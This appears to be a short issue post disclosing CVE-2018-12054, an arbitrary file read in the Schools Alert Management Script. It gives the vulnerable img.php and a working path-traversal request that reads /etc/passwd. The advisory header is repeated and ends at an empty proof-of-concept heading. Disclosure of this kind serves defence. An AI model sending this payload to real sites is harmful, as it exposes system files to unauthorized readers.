Open unh3x opened 6 years ago
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: M3@pandas From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12054
img.php
/img.php?f=/./etc/./passwd
================= Schools Alert Management Script - Arbitrary File Read
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: M3@pandas From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12054
================= Vulnerable cgi:
img.php
================= Proof of Concept: